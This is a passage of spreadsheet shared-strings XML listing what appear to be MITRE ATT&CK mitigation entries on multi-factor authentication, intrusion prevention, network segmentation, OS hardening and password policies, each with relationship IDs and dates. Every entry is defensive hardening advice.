    <t>relationship--509555cb-1a35-4e09-bc6e-a2c9c521f827</t>
  </si>
  <si>
    <t>Use multi-factor authentication for cloud accounts, especially privileged accounts. This can be implemented in a variety of forms (e.g. hardware, virtual, SMS), and can also be audited using administrative reporting features.(Citation: AWS - IAM Console Best Practices)</t>
  </si>
  <si>
    <t>relationship--68ad793a-2678-4537-8480-8086fd4d757e</t>
  </si>
  <si>
    <t>04 August 2020</t>
  </si>
  <si>
    <t>Use multi-factor authentication on cloud services whenever possible.</t>
  </si>
  <si>
    <t>relationship--c4e70046-dbed-4e21-8a00-37bbb6de5bc4</t>
  </si>
  <si>
    <t>Use multi-factor authentication for logons to code repositories.</t>
  </si>
  <si>
    <t>relationship--f8878fab-91a9-49d2-b985-fefa10e22ade</t>
  </si>
  <si>
    <t>relationship--a3012b2b-b19c-46fc-944c-d04d9c4b897b</t>
  </si>
  <si>
    <t>relationship--ce2f8c4d-43f0-459e-a579-1faf28e4bca6</t>
  </si>
  <si>
    <t>06 April 2021</t>
  </si>
  <si>
    <t>Consider using multi-factor authentication to restrict access to resources and cloud storage APIs.(Citation: Amazon S3 Security, 2019)</t>
  </si>
  <si>
    <t>relationship--ee3162ad-e88e-401c-9fdf-e7f0784141a4</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</si>
  <si>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</si>
  <si>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relationship--56f2efc6-fb22-47f9-a86f-db5c69224936</t>
  </si>
  <si>
    <t>23 February 2023</t>
  </si>
  <si>
    <t>relationship--4e949816-0200-45ed-b0c6-27afce63fd17</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</si>
  <si>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</si>
  <si>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relationship--45912a00-141c-45ec-afb6-2ac272764c14</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</si>
  <si>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</si>
  <si>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relationship--acd4512e-3ef7-4c33-9fc1-c3829efebe60</t>
  </si>
  <si>
    <t>Use multi-factor authentication for user and privileged accounts. Most embedded network devices support TACACS+ and/or RADIUS.  Follow vendor prescribed best practices for hardening access control.(Citation: Cisco IOS Software Integrity Assurance - TACACS)</t>
  </si>
  <si>
    <t>relationship--6e32fdd0-c094-405e-8246-7502c9aedb68</t>
  </si>
  <si>
    <t>Use of multi-factor authentication for public-facing webmail servers is a recommended best practice to minimize the usefulness of usernames and passwords to adversaries.</t>
  </si>
  <si>
    <t>relationship--3709ccc2-2370-4dc9-92ac-792867bbdea4</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</si>
  <si>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</si>
  <si>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relationship--e23d57b4-5bc4-4d06-9084-9c99464c4af8</t>
  </si>
  <si>
    <t>relationship--77a73e89-d4b6-47c7-8676-8208c3797680</t>
  </si>
  <si>
    <t>relationship--1e4070de-5bae-4900-a3a8-907190f34dd4</t>
  </si>
  <si>
    <t>12 August 2021</t>
  </si>
  <si>
    <t>relationship--2686dfb7-60ab-424c-add2-2f164a98cfa4</t>
  </si>
  <si>
    <t>10 February 2022</t>
  </si>
  <si>
    <t>relationship--441e6528-4342-4387-848b-febb051e05f7</t>
  </si>
  <si>
    <t>Ensure that MFA and MFA policies and requirements are properly implemented for existing and deactivated or dormant accounts and devices. If possible, consider configuring MFA solutions to "fail closed" rather than grant access in case of serious errors.</t>
  </si>
  <si>
    <t>relationship--eb985609-6a5f-4e44-9bae-bfbc1e93d978</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</si>
  <si>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</si>
  <si>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relationship--3a907723-bc0a-4a35-a9fc-dd45ad7752a8</t>
  </si>
  <si>
    <t>Use multi-factor authentication for user and privileged accounts. Most embedded network devices support TACACS+ and/or RADIUS.  Follow vendor prescribed best practices for hardening access control. (Citation: Cisco IOS Software Integrity Assurance - TACACS)</t>
  </si>
  <si>
    <t>relationship--7b6a48c0-9bcc-47d2-976a-e7dbaa00f4bc</t>
  </si>
  <si>
    <t>relationship--3541e998-a3ac-42d7-8a66-f66da6f9162a</t>
  </si>
  <si>
    <t>relationship--fa8d6c79-557f-44e1-a27b-55f87b2c8084</t>
  </si>
  <si>
    <t>Use multi-factor authentication wherever possible.</t>
  </si>
  <si>
    <t>relationship--0ccddf91-2cf3-4801-a10b-ca4d253f2c8c</t>
  </si>
  <si>
    <t>relationship--dc1b1842-ce36-46ec-83d5-66292d65c463</t>
  </si>
  <si>
    <t>relationship--7fad18cd-28b4-47b4-8b38-f8beaf1120ad</t>
  </si>
  <si>
    <t>relationship--64201f56-d678-4ed2-b759-c78bf9e4d82a</t>
  </si>
  <si>
    <t>relationship--f1d0e2ed-3d68-4606-8a1c-3a78f9b55afe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</si>
  <si>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</si>
  <si>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relationship--22501b39-e106-4a7f-b915-013c30f47af8</t>
  </si>
  <si>
    <t>Use multi-factor authentication for remote logins.(Citation: Berkley Secure)</t>
  </si>
  <si>
    <t>relationship--96014091-aba9-4b8f-ac6a-6cdeb593cf30</t>
  </si>
  <si>
    <t>relationship--854e11fd-f29e-4b7e-a3c2-f4c8c9ee302f</t>
  </si>
  <si>
    <t>Use multi-factor authentication on remote service logons where possible.</t>
  </si>
  <si>
    <t>relationship--df529a76-525d-4a35-a9d2-48ec41f71459</t>
  </si>
  <si>
    <t>06 October 2021</t>
  </si>
  <si>
    <t>Require multi-factor authentication for SSH connections wherever possible, such as password protected SSH keys.</t>
  </si>
  <si>
    <t>relationship--77c5bb7d-9584-4d57-850b-6349984181a8</t>
  </si>
  <si>
    <t>Ensure proper system and access isolation for critical network systems through use of multi-factor authentication.</t>
  </si>
  <si>
    <t>relationship--c869db21-9c91-4449-b316-408bcab56e1b</t>
  </si>
  <si>
    <t>A physical second factor key that uses the target login domain as part of the negotiation protocol will prevent session cookie theft through proxy methods.(Citation: Evilginx 2 July 2018)</t>
  </si>
  <si>
    <t>relationship--7a1cf82e-68e5-49ca-89ae-e492cd85dab4</t>
  </si>
  <si>
    <t>14 October 2019</t>
  </si>
  <si>
    <t>Require MFA for all delegated administrator accounts.(Citation: Microsoft Nobelium Admin Privileges)</t>
  </si>
  <si>
    <t>relationship--884c3843-5065-4919-ad6e-0f77130b4d36</t>
  </si>
  <si>
    <t>M1031</t>
  </si>
  <si>
    <t>Network Intrusion Prevention</t>
  </si>
  <si>
    <t>course-of-action--12241367-a8b7-49b4-b86e-2236901ba50c</t>
  </si>
  <si>
    <t>Network intrusion detection and prevention systems that can identify traffic patterns indicative of AiTM activity can be used to mitigate activity at the network level.</t>
  </si>
  <si>
    <t>relationship--55e36f24-f7dd-4966-b39f-88349b86fff3</t>
  </si>
  <si>
    <t>relationship--911ca56b-8fd3-4efc-855c-f1754c8b05b7</t>
  </si>
  <si>
    <t>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level.</t>
  </si>
  <si>
    <t>relationship--19f35c88-92c4-4e98-b024-be9f6731bdb5</t>
  </si>
  <si>
    <t>relationship--a601c8b3-4d54-42d9-a2fd-61455a5dff4a</t>
  </si>
  <si>
    <t>relationship--ff5db468-c3a7-4292-9a50-237cf163cb37</t>
  </si>
  <si>
    <t>Network intrusion detection and prevention systems that can identify traffic patterns indicative of AiTM activity can be used to mitigate activity at the network level.(Citation: dhcp_serv_op_events)</t>
  </si>
  <si>
    <t>relationship--796be792-45ef-4052-bcee-1ce1384a80f7</t>
  </si>
  <si>
    <t xml:space="preserve">Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. </t>
  </si>
  <si>
    <t>relationship--c9f53392-065d-4573-a08a-37bc3d24d3e5</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</si>
  <si>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</si>
  <si>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relationship--1e2075a3-5271-4ebf-aa9b-6a09ea985b76</t>
  </si>
  <si>
    <t>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate some obfuscation activity at the network level.</t>
  </si>
  <si>
    <t>relationship--82cf0b15-1cd0-4539-b3fe-63ee4d379113</t>
  </si>
  <si>
    <t>Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary command and control infrastructure and malware can be used to mitigate activity at the network level.</t>
  </si>
  <si>
    <t>relationship--a0a004fe-2636-4f6d-85c7-2401768252a2</t>
  </si>
  <si>
    <t>Configure intrusion prevention devices to detect SNMP queries and commands from unauthorized sources.(Citation: US-CERT-TA18-106A)</t>
  </si>
  <si>
    <t>relationship--c217ea78-f411-4dd1-a019-8aa3e366df23</t>
  </si>
  <si>
    <t>relationship--9b9f3a63-98f1-4ea5-9c64-00bc6f237778</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</si>
  <si>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</si>
  <si>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relationship--1e624981-b765-41ac-a2dc-468ba07e3614</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</si>
  <si>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</si>
  <si>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relationship--0c2dadcb-36c4-4255-a53d-e54f1bb71c5f</t>
  </si>
  <si>
    <t>relationship--c1b721af-9d2b-47a2-a712-3bff64628148</t>
  </si>
  <si>
    <t>relationship--7bdcd3e6-f741-4f62-9495-3111309adad8</t>
  </si>
  <si>
    <t xml:space="preserve">Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary command and control infrastructure and malware can be used to mitigate activity at the network level. </t>
  </si>
  <si>
    <t>relationship--4ff00908-ef82-45dc-bb71-bf1cea80063e</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</si>
  <si>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</si>
  <si>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relationship--34503727-d78b-4e67-b944-83546cc473e2</t>
  </si>
  <si>
    <t>relationship--51d3bdc8-5fe4-470a-9ffa-5497caf4493c</t>
  </si>
  <si>
    <t>relationship--1a493d52-b97f-4cf3-a85b-1e9aaa66a410</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</si>
  <si>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</si>
  <si>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relationship--3c67124e-e215-4c33-aff7-7a7b98735a0f</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</si>
  <si>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</si>
  <si>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relationship--1469ff36-c655-4513-8ffa-81dcb55c4ae6</t>
  </si>
  <si>
    <t>relationship--bd072d13-3815-46eb-ae84-1aba38db3fab</t>
  </si>
  <si>
    <t>21 August 2020</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</si>
  <si>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</si>
  <si>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relationship--1ddae833-8280-4afa-b2b0-e250e22104fe</t>
  </si>
  <si>
    <t>relationship--864def70-2079-4015-8852-d77e19dd086c</t>
  </si>
  <si>
    <t xml:space="preserve">Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate some obfuscation activity at the network level. </t>
  </si>
  <si>
    <t>relationship--7fd7a4ea-aa95-4037-8bb2-0ff6b06de179</t>
  </si>
  <si>
    <t>relationship--6a1dd165-a32a-405c-8c1b-c0a17c8ce710</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</si>
  <si>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</si>
  <si>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relationship--6f1f4c7b-dc86-44e3-9ff2-ea9451ea90ee</t>
  </si>
  <si>
    <t>relationship--78b31fa7-10ef-4c28-888e-71da978e9e81</t>
  </si>
  <si>
    <t>Network prevention intrusion systems and systems designed to scan and remove malicious downloads can be used to block activity.</t>
  </si>
  <si>
    <t>relationship--7fa20508-8d9f-4070-8e8b-b71eefade05f</t>
  </si>
  <si>
    <t>If a link is being visited by a user, network intrusion prevention systems and systems designed to scan and remove malicious downloads can be used to block activity.</t>
  </si>
  <si>
    <t>relationship--7194f06c-abd5-4ff8-ad95-2449adaa4c13</t>
  </si>
  <si>
    <t>relationship--3a348ba8-5608-4e9b-a180-f66cfad9896e</t>
  </si>
  <si>
    <t>Configure intrusion prevention devices to detect SNMP queries and commands from unauthorized sources. Create signatures to detect Smart Install (SMI) usage from sources other than trusted director.(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)</t>
  </si>
  <si>
    <t>relationship--9160a38d-799b-431d-a5d1-a9b4099ab8b1</t>
  </si>
  <si>
    <t>Use network intrusion detection/prevention systems to detect and prevent remote service scans.</t>
  </si>
  <si>
    <t>relationship--651225d6-5454-4c44-8d62-776bd7ddaed2</t>
  </si>
  <si>
    <t>relationship--418bde38-35eb-44bc-a454-ad7d2918bda5</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</si>
  <si>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</si>
  <si>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relationship--f8e6711c-de3d-4c9f-a255-96fa7719e0a4</t>
  </si>
  <si>
    <t>relationship--f07b76ab-6e72-4112-bc23-3b64b50131f0</t>
  </si>
  <si>
    <t>relationship--cb55e462-8b1d-4916-8f69-087538d0d209</t>
  </si>
  <si>
    <t>Network intrusion prevention systems and systems designed to scan and remove malicious email attachments or links can be used to block activity.</t>
  </si>
  <si>
    <t>relationship--76588f90-79b8-4a61-ae07-3321393e5707</t>
  </si>
  <si>
    <t>relationship--c64b3644-a838-4ed3-a6f3-fc770637b009</t>
  </si>
  <si>
    <t>relationship--17639fa3-3f77-4481-b24f-9df82fcbf324</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</si>
  <si>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</si>
  <si>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relationship--d50b5687-ea69-40f9-86f3-eecd7e015bac</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</si>
  <si>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</si>
  <si>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relationship--e8dda697-0d9b-4c99-baa1-1d64f7dd5a02</t>
  </si>
  <si>
    <t>Network intrusion detection and prevention systems that use network signatures may be able to prevent traffic to remote access services.</t>
  </si>
  <si>
    <t>relationship--d5c70727-794c-4404-b30d-0d798a62ad64</t>
  </si>
  <si>
    <t>relationship--95d846ca-5705-4a69-9d76-7d886ce86cec</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</si>
  <si>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</si>
  <si>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relationship--9802575b-e7bf-417b-8c4e-cfa922e2792b</t>
  </si>
  <si>
    <t>Network intrusion prevention systems and systems designed to scan and remove malicious email attachments can be used to block activity.</t>
  </si>
  <si>
    <t>relationship--7a75d200-29f5-4f8a-b052-bcbe4e5ca236</t>
  </si>
  <si>
    <t>relationship--f4d0878b-5e03-439b-84b4-3909a1962016</t>
  </si>
  <si>
    <t>relationship--c2097180-b02f-4ffc-b0a6-8e8bb899a551</t>
  </si>
  <si>
    <t>relationship--64fa019e-5eb1-404c-9488-d4083ccc8b65</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</si>
  <si>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</si>
  <si>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relationship--123c8150-c814-4bf2-b06f-e005cb257e17</t>
  </si>
  <si>
    <t>relationship--a24399b5-218e-41b5-8904-9e8e0599ae25</t>
  </si>
  <si>
    <t>relationship--8e567361-e2de-4dc6-b953-ec82dc143f58</t>
  </si>
  <si>
    <t>relationship--c1414165-48e9-4bd7-a5af-72d61d2ec2d1</t>
  </si>
  <si>
    <t>relationship--3024f916-b25c-4dd8-aab3-4d681b335da1</t>
  </si>
  <si>
    <t>M1030</t>
  </si>
  <si>
    <t>Network Segmentation</t>
  </si>
  <si>
    <t>course-of-action--86598de0-b347-4928-9eb0-0acbfc21908c</t>
  </si>
  <si>
    <t>Configure access controls and firewalls to limit access to critical systems and domain controllers. Most cloud environments support separate virtual private cloud (VPC) instances that enable further segmentation of cloud systems.</t>
  </si>
  <si>
    <t>relationship--21ea4371-e692-4731-9f8c-c3f4dff3c775</t>
  </si>
  <si>
    <t>relationship--69f9daff-c253-4d99-94e6-cd2a7a9483dc</t>
  </si>
  <si>
    <t>Network segmentation can be used to isolate infrastructure components that do not require broad network access. This may mitigate, or at least alleviate, the scope of AiTM activity.</t>
  </si>
  <si>
    <t>relationship--a19d3dcf-29a2-4e3f-9138-55dc8ace1ee5</t>
  </si>
  <si>
    <t>Deny direct remote access to internal systems through the use of network proxies, gateways, and firewalls.</t>
  </si>
  <si>
    <t>relationship--57db6603-303e-4749-8a92-2e4021aee764</t>
  </si>
  <si>
    <t>relationship--3f955b55-4a20-46f5-bf40-802382642b33</t>
  </si>
  <si>
    <t>relationship--a439669e-49b7-4197-a6e7-7e5ea11136df</t>
  </si>
  <si>
    <t>relationship--1d362b9d-300d-4081-bd42-ca57c892a331</t>
  </si>
  <si>
    <t>Configure access controls and firewalls to limit access to domain controllers and systems used to create and manage accounts.</t>
  </si>
  <si>
    <t>relationship--26099ea8-5af8-4173-b70d-b32bbcbe0732</t>
  </si>
  <si>
    <t>Identify critical business and system processes that may be targeted by adversaries and work to isolate and secure those systems against unauthorized access and tampering.</t>
  </si>
  <si>
    <t>relationship--b7330e62-2388-44e7-ab1c-5cac3df16d27</t>
  </si>
  <si>
    <t>Segregate SNMP traffic on a separate management network.(Citation: US-CERT TA17-156A SNMP Abuse 2017)</t>
  </si>
  <si>
    <t>relationship--a538a888-c4a1-49a7-b343-eb85ab6d665f</t>
  </si>
  <si>
    <t>relationship--6f3caebf-2c07-45de-b2f3-622dc8fcf59e</t>
  </si>
  <si>
    <t>Enable Windows firewall, which prevents DCOM instantiation by default.</t>
  </si>
  <si>
    <t>relationship--99651be9-3231-4d78-b36d-5330a3b418fc</t>
  </si>
  <si>
    <t>relationship--d5fc744e-c8a0-454a-9832-71dede3897ba</t>
  </si>
  <si>
    <t>Employ network segmentation for sensitive domains.(Citation: Harmj0y Domain Trusts).</t>
  </si>
  <si>
    <t>relationship--68949ed4-db1b-40bb-b2ca-1a91d2739295</t>
  </si>
  <si>
    <t>Follow best practices for network firewall configurations to allow only necessary ports and traffic to enter and exit the network.(Citation: TechNet Firewall Design)</t>
  </si>
  <si>
    <t>relationship--4867dbb4-1e1b-45f6-9070-8e2c0c303638</t>
  </si>
  <si>
    <t>relationship--a101f85c-31ca-41af-ac16-c77d585dd8e6</t>
  </si>
  <si>
    <t>relationship--cf48cb46-cdff-440c-96bb-a7a8368306ca</t>
  </si>
  <si>
    <t>relationship--b1c7a31e-1920-4750-bdd6-bd4c9908c319</t>
  </si>
  <si>
    <t>Segment externally facing servers and services from the rest of the network with a DMZ or on separate hosting infrastructure.</t>
  </si>
  <si>
    <t>relationship--3b726298-74dc-4f8a-b58d-f623bc645124</t>
  </si>
  <si>
    <t>Segment networks and systems appropriately to reduce access to critical systems and services to controlled methods.</t>
  </si>
  <si>
    <t>relationship--474d9df3-c596-4468-877a-85e4ad91ccbb</t>
  </si>
  <si>
    <t>relationship--8df2f4b5-3f60-4b8f-b4aa-dd76eb347ab0</t>
  </si>
  <si>
    <t>relationship--c4dfcece-bbcd-419a-9f29-0855ae096c76</t>
  </si>
  <si>
    <t xml:space="preserve">Segregate SNMP traffic on a separate management network.(Citation: US-CERT TA17-156A SNMP Abuse 2017) </t>
  </si>
  <si>
    <t>relationship--3dbcc83a-1e60-4ae4-a1f9-b37e1aa7d7b0</t>
  </si>
  <si>
    <t>Ensure proper network segmentation is followed to protect critical servers and devices.</t>
  </si>
  <si>
    <t>relationship--80f94d40-0861-4403-b206-1c864a136788</t>
  </si>
  <si>
    <t>Deny direct access of broadcasts and multicast sniffing, and prevent attacks such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001)</t>
  </si>
  <si>
    <t>relationship--d6a77085-88e6-4446-8613-2933d1f3f55e</t>
  </si>
  <si>
    <t>Properly configure firewalls and proxies to limit outgoing traffic to only necessary ports and through proper network gateway systems. Also ensure hosts are only provisioned to communicate over authorized interfaces.</t>
  </si>
  <si>
    <t>relationship--b2a42d95-fc64-4e6f-95d9-7b24334bccd4</t>
  </si>
  <si>
    <t>Properly configure firewalls and proxies to limit outgoing traffic to only necessary ports for that particular network segment.</t>
  </si>
  <si>
    <t>relationship--840fc319-2583-4a2b-8363-1a7e3fa33157</t>
  </si>
  <si>
    <t>Enable firewall rules to block RDP traffic between network security zones within a network.</t>
  </si>
  <si>
    <t>relationship--4011ead8-6843-4213-a32e-1edf2c50389a</t>
  </si>
  <si>
    <t>Do not leave RDP accessible from the internet. Enable firewall rules to block RDP traffic between network security zones within a network.</t>
  </si>
  <si>
    <t>relationship--3951503f-c8e9-4331-834e-df4e4afda5fb</t>
  </si>
  <si>
    <t>Enable firewall rules to block unnecessary traffic between network security zones within a network.</t>
  </si>
  <si>
    <t>relationship--82832161-8d07-45d1-a082-c6958191f16c</t>
  </si>
  <si>
    <t>relationship--0f285d1e-eca9-4003-9a7f-454f3457e7ac</t>
  </si>
  <si>
    <t>relationship--bd6e2eb9-a024-446f-bf9e-46c7ce4d8919</t>
  </si>
  <si>
    <t>Operate intrusion detection, analysis, and response systems on a separate network from the production environment to lessen the chances that an adversary can see and interfere with critical response functions.</t>
  </si>
  <si>
    <t>relationship--40cd458c-5a59-4a8d-a04a-3cd3faebaf66</t>
  </si>
  <si>
    <t>02 March 2021</t>
  </si>
  <si>
    <t>Ensure proper system isolation for critical network systems through use of firewalls.</t>
  </si>
  <si>
    <t>relationship--8eaad388-b7ef-4fb8-88e6-c6f36065c8c4</t>
  </si>
  <si>
    <t>Network segmentation can be used to isolate infrastructure components that do not require broad network access.</t>
  </si>
  <si>
    <t>relationship--f0e9a1f7-8600-4558-9d2e-91126c42b126</t>
  </si>
  <si>
    <t>16 November 2020</t>
  </si>
  <si>
    <t>If the service is necessary, lock down critical enclaves with separate WinRM infrastructure and follow WinRM best practices on use of host firewalls to restrict WinRM access to allow communication only to/from specific devices.(Citation: NSA Spotting)</t>
  </si>
  <si>
    <t>relationship--cb57c953-1aab-4706-8947-545d4cb0cdce</t>
  </si>
  <si>
    <t>M1028</t>
  </si>
  <si>
    <t>Operating System Configuration</t>
  </si>
  <si>
    <t>course-of-action--2f316f6c-ae42-44fe-adf8-150989e0f6d3</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</si>
  <si>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</si>
  <si>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relationship--540937b6-1afd-4f8b-8deb-c1c4f6456ce7</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</si>
  <si>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</si>
  <si>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relationship--cc458462-2c4e-443c-977a-805ea1d6e5a8</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</si>
  <si>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</si>
  <si>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relationship--620d641c-8f76-45f3-a86f-03dd28399d5c</t>
  </si>
  <si>
    <t>Protect domain controllers by ensuring proper security configuration for critical servers to limit access by potentially unnecessary protocols and services, such as SMB file sharing.</t>
  </si>
  <si>
    <t>relationship--ff7f776f-001a-4c86-b359-08c89bd08b3e</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</si>
  <si>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</si>
  <si>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relationship--1fdd8726-606a-482d-b371-044eea79be29</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</si>
  <si>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</si>
  <si>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relationship--57d1a497-ef75-46de-b284-eefa90a99172</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</si>
  <si>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</si>
  <si>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relationship--ab8f7561-4e27-4974-b93d-03a9c1ae4543</t>
  </si>
  <si>
    <t>Consider limiting the number of cached credentials (HKLM\SOFTWARE\Microsoft\Windows NT\Current Version\Winlogon\cachedlogonscountvalue)(Citation: Tilbury Windows Credentials)</t>
  </si>
  <si>
    <t>relationship--a1ee7b5a-94cd-4b3a-aa53-55844968c28f</t>
  </si>
  <si>
    <t>Disallow or restrict removable media at an organizational policy level if they are not required for business operations.(Citation: TechNet Removable Media Control)</t>
  </si>
  <si>
    <t>relationship--c4b3287c-5e5a-4ec0-bc20-4e3b6a0c296f</t>
  </si>
  <si>
    <t>16 July 2019</t>
  </si>
  <si>
    <t>Protect domain controllers by ensuring proper security configuration for critical servers.</t>
  </si>
  <si>
    <t>relationship--6808a607-0c81-433b-a027-2f1a8fe163c9</t>
  </si>
  <si>
    <t xml:space="preserve">Ensure that Driver Signature Enforcement is enabled to restrict unsigned drivers from being installed. </t>
  </si>
  <si>
    <t>relationship--5eb23e3a-c1fb-4d96-99d1-65be2e0a76ca</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</si>
  <si>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</si>
  <si>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relationship--9ef08a26-d881-4a36-952b-c07808093c6b</t>
  </si>
  <si>
    <t>relationship--c0269d4e-456a-4e10-ae89-6b50b447c94d</t>
  </si>
  <si>
    <t>Disable the default to “hide file extensions for known file types” in Windows OS.(Citation: Seqrite DoubleExtension)(Citation: HowToGeek ShowExtension)</t>
  </si>
  <si>
    <t>relationship--cb0b7f7e-9ce2-4917-8eda-ae92080f6ff1</t>
  </si>
  <si>
    <t>10 August 2021</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</si>
  <si>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</si>
  <si>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relationship--086ec3ab-803e-4531-a451-15fa9f06297c</t>
  </si>
  <si>
    <t>24 March 2021</t>
  </si>
  <si>
    <t>Prevent the creation of new network adapters where possible.</t>
  </si>
  <si>
    <t>relationship--c9bce6d2-de66-4114-9cf6-2be555c35194</t>
  </si>
  <si>
    <t>Prevent the creation of new network adapters where possible.(Citation: Microsoft GPO Bluetooth FEB 2009)(Citation: TechRepublic Wireless GPO FEB 2009)</t>
  </si>
  <si>
    <t>relationship--818e5053-404d-4cc2-ba72-037767737e04</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</si>
  <si>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</si>
  <si>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relationship--a45378ad-7f38-47d3-87e1-a3133b29b89b</t>
  </si>
  <si>
    <t>Make sure that the &lt;code&gt;HISTCONTROL&lt;/code&gt; environment variable is set to “ignoredups” instead of “ignoreboth” or “ignorespace”.</t>
  </si>
  <si>
    <t>relationship--00876444-466d-40fe-8de5-0c13fcd0ea1a</t>
  </si>
  <si>
    <t>Consider technical controls to prevent the disabling of services or deletion of files involved in system recovery. Additionally, ensure that WinRE is enabled using the following command: &lt;code&gt;reagentc /enable&lt;/code&gt;.(Citation: reagentc_cmd)</t>
  </si>
  <si>
    <t>relationship--c4cd9acb-aaea-4b77-890e-f153a58623a4</t>
  </si>
  <si>
    <t>20 February 2023</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</si>
  <si>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</si>
  <si>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relationship--afd15f23-1829-4d86-9d8b-cae915fe8596</t>
  </si>
  <si>
    <t>25 August 2021</t>
  </si>
  <si>
    <t>Consider disabling or restricting NTLM.(Citation: Microsoft Disable NTLM Nov 2012) Consider disabling WDigest authentication.(Citation: Microsoft WDigest Mit)</t>
  </si>
  <si>
    <t>relationship--516e746b-6208-41db-8ea8-4e3fa42f5053</t>
  </si>
  <si>
    <t>relationship--13363d50-e3cc-4e6c-906a-47df844b8694</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</si>
  <si>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</si>
  <si>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relationship--fc8ef14d-1a07-4f96-85c3-b62ba6bcffc1</t>
  </si>
  <si>
    <t>Starting in Windows 11 22H2, the `EnableMPRNotifications` policy can be disabled through Group Policy or through a configuration service provider to prevent Winlogon from sending credentials to network providers.(Citation: EnableMPRNotifications)</t>
  </si>
  <si>
    <t>relationship--f3ebb911-aab1-4aa8-aac8-0dcc2aec5343</t>
  </si>
  <si>
    <t>Enable Windows Group Policy “Do Not Allow Anonymous Enumeration of SAM Accounts and Shares” security setting to limit users who can enumerate network shares.(Citation: Windows Anonymous Enumeration of SAM Accounts)</t>
  </si>
  <si>
    <t>relationship--af69bb4e-4cdb-4a9d-afff-5508c99c1276</t>
  </si>
  <si>
    <t xml:space="preserve">
Consider disabling or restricting NTLM.(Citation: Microsoft Disable NTLM Nov 2012) Consider disabling WDigest authentication.(Citation: Microsoft WDigest Mit)</t>
  </si>
  <si>
    <t>relationship--fe849763-78b9-4b8a-9219-2781ac7b00e8</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</si>
  <si>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</si>
  <si>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relationship--9d439426-989c-4407-bbef-ac6af47896cc</t>
  </si>
  <si>
    <t>Change GPOs to define shorter timeouts sessions and maximum amount of time any single session can be active. Change GPOs to specify the maximum amount of time that a disconnected session stays active on the RD session host server.(Citation: Windows RDP Sessions)</t>
  </si>
  <si>
    <t>relationship--5d0c84c6-1f4b-4adf-924a-7b5489bd0933</t>
  </si>
  <si>
    <t>relationship--4b5e4611-ed5c-4223-bc75-5e272090b887</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</si>
  <si>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</si>
  <si>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relationship--eccad76f-c5fa-46db-9ccb-5a9ebcada28e</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</si>
  <si>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</si>
  <si>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relationship--63c9cdd8-0e64-46dd-9459-3d64828b0cc7</t>
  </si>
  <si>
    <t>Consider disabling or restricting NTLM.(Citation: Microsoft Disable NTLM Nov 2012)</t>
  </si>
  <si>
    <t>relationship--afee7475-8e61-4bed-98f6-2cee6926e1c8</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</si>
  <si>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</si>
  <si>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relationship--3815ee11-af3f-48ae-b5b4-d0a0b2aa4d01</t>
  </si>
  <si>
    <t>21 March 2022</t>
  </si>
  <si>
    <t>relationship--1c0ec3cf-8942-4d47-b1ac-dfdaca31bac0</t>
  </si>
  <si>
    <t>Ensuring that the &lt;code&gt;tty_tickets&lt;/code&gt; setting is enabled will prevent this leakage across tty sessions.</t>
  </si>
  <si>
    <t>relationship--b69490a4-3768-405e-856d-da11d95183e7</t>
  </si>
  <si>
    <t>14 March 2022</t>
  </si>
  <si>
    <t>Follow vendor device hardening best practices to disable unnecessary and unused features and services, avoid using default configurations and passwords, and introduce logging and auditing for detection.</t>
  </si>
  <si>
    <t>relationship--46ace311-9be9-4d4a-8ef0-fc2c0659fba9</t>
  </si>
  <si>
    <t>relationship--5401a61d-a795-4619-aa7e-fdf54cd4358e</t>
  </si>
  <si>
    <t>relationship--33aebe8f-cc59-4953-9648-ba6bf1654cda</t>
  </si>
  <si>
    <t>M1027</t>
  </si>
  <si>
    <t>Password Policies</t>
  </si>
  <si>
    <t>course-of-action--90c218c3-fbf8-4830-98a7-e8cfb7eaa485</t>
  </si>
  <si>
    <t>Ensure that root accounts have complex, unique passwords across all systems on the network.</t>
  </si>
  <si>
    <t>relationship--874955d4-086a-4232-ab37-3aa2ad5bdfa5</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</si>
  <si>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</si>
  <si>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relationship--6e751301-3697-4851-b55c-259976891406</t>
  </si>
  <si>
    <t>Refer to NIST guidelines when creating password policies.(Citation: NIST 800-63-3)</t>
  </si>
  <si>
    <t>relationship--d1f67e5c-72c6-4e26-91d4-bc8593e61774</t>
  </si>
  <si>
    <t>Ensure that local administrator accounts have complex, unique passwords across all systems on the network.</t>
  </si>
  <si>
    <t>relationship--7b96aae7-0234-496c-abb5-6d9600041d7b</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</si>
  <si>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</si>
  <si>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relationship--124e7a8b-5bc6-499d-8ca5-4c25b3ed8602</t>
  </si>
  <si>
    <t>Refer to NIST guidelines when creating password policies. (Citation: NIST 800-63-3)</t>
  </si>
  <si>
    <t>relationship--579ddc49-aacd-4b02-9f90-4ee1689f4f23</t>
  </si>
  <si>
    <t>Establish an organizational policy that prohibits password storage in files.</t>
  </si>
  <si>
    <t>relationship--fab558cd-cb4a-4e7a-a3c7-184bee680019</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</si>
  <si>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</si>
  <si>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relationship--c19fcf1c-8c2c-4a71-a1fb-43934cc6ba23</t>
  </si>
  <si>
    <t>24 April 2021</t>
  </si>
  <si>
    <t>Organizations may consider weighing the risk of storing credentials in web browsers. If web browser credential disclosure is a significant concern, technical controls, policy, and user training may be used to prevent storage of credentials in web browsers.</t>
  </si>
  <si>
    <t>relationship--d2bb226a-810d-47ea-be8d-397b9dd94031</t>
  </si>
  <si>
    <t>15 February 2022</t>
  </si>
  <si>
    <t>Do not store credentials within the Registry.</t>
  </si>
  <si>
    <t>relationship--1eb94d47-7732-488e-b040-2bff5ab859a7</t>
  </si>
  <si>
    <t>relationship--684f1e70-9f35-4810-9477-133d2641bdbd</t>
  </si>
  <si>
    <t>Applications and appliances that utilize default username and password should be changed immediately after the installation, and before deployment to a production environment. (Citation: US-CERT Alert TA13-175A Risks of Default Passwords on the Internet)</t>
  </si>
  <si>
    <t>relationship--884964fd-ae2b-4a3f-a023-98e79b967943</t>
  </si>
  <si>
    <t>05 April 2021</t>
  </si>
  <si>
    <t>Refer to NIST guidelines when creating password policies.  (Citation: NIST 800-63-3)</t>
  </si>
  <si>
    <t>relationship--dc9ff40d-a9c6-4042-b4f5-922ca7a64536</t>
  </si>
  <si>
